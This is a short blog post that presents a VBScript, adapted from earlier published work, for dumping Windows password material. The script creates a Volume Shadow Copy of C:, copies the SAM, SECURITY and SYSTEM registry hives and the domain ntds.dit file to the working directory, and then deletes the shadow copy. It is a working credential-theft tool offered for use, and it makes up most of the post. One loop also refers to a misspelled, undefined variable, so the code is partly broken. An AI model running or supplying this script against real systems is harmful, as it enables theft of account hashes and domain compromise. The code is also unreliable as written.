This is nothing new if you follow security. A while back Tim Tomes and Mark Baggett discovered you could safely get at system hashes by dumping the system hives and the ntds.dit with the Volume Shadowcopy Service. Tim even wrote a vbscript that allowed you to interact with windows VSS in a very detailed manner and even on workstations that didn't include full vssadmin functionality. (http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html)
Well being a rather lazy geek I took his script and tooled it around a bit so it did everything for me. The result was a vbscript that runs on Windows Vista, 7, and 2008 that will dump the system hives and ntds.dit if found.
I am not a true code monkey so please forgive the sloppy code :)
'''Setting Variables'''
strComputer = "."
set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
'''Start VSS'''
set objListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
for each objService in objListOfServices
objService.StartService()
next
'''Create a new shadow copy'''
set objShadowStorage = objWMIService.Get("Win32_ShadowCopy")
varCreateResult = objShadowStorage.Create("C:\", "ClientAccessible", strShadowID)
'''Find the directory path for the shadow copy'''
set colListItems = objWMIService.ExecQuery("Select * from Win32_ShadowCopy")
for each objListItem in colListItems
if objListItem.ID = strShadowID then
strShadowPath = objListItem.DeviceObject
end if
next
'''Copy the NTDS.DIT and SAM/SEC/SYS hives from the shadow copy volume'''
set objShell = wscript.CreateObject( "WScript.Shell" )
strComputerName = objShell.ExpandEnvironmentStrings( "%COMPUTERNAME%" )
set objFSO = CreateObject("Scripting.FileSystemObject")
strDestDir = CreateObject("Scripting.FileSystemObject").GetAbsolutePathName(".")
strShadowPath = replace(strShadowPath,"?",".",1,1)
strDumpPaths = array("\windows\system32\config\","\windows\system32\ntds\")
strDumpItems = array("SAM","SECURITY","SYSTEM","ntds.dit")
for each lstDumpPaths in strDumpPathsasreplaced
for each lstDumpItems in strDumpItems
strTempPath = strShadowPath & lstDumpPaths & lstDumpItems
if objFSO.FileExists(strTempPath) then
objFSO.CopyFile strTempPath, strDestDir & "\" & strComputerName & "-" & lstDumpItems, true
end if
next
next
'''Delete the temporary shadow copy'''
set objDelItems = objWMIService.ExecQuery("Select * From Win32_ShadowCopy")
for each lstDelItem in objDelItems
if lstDelItem.ID = strShadowID then
varDelResult = lstDelItem.Delete_
end if
next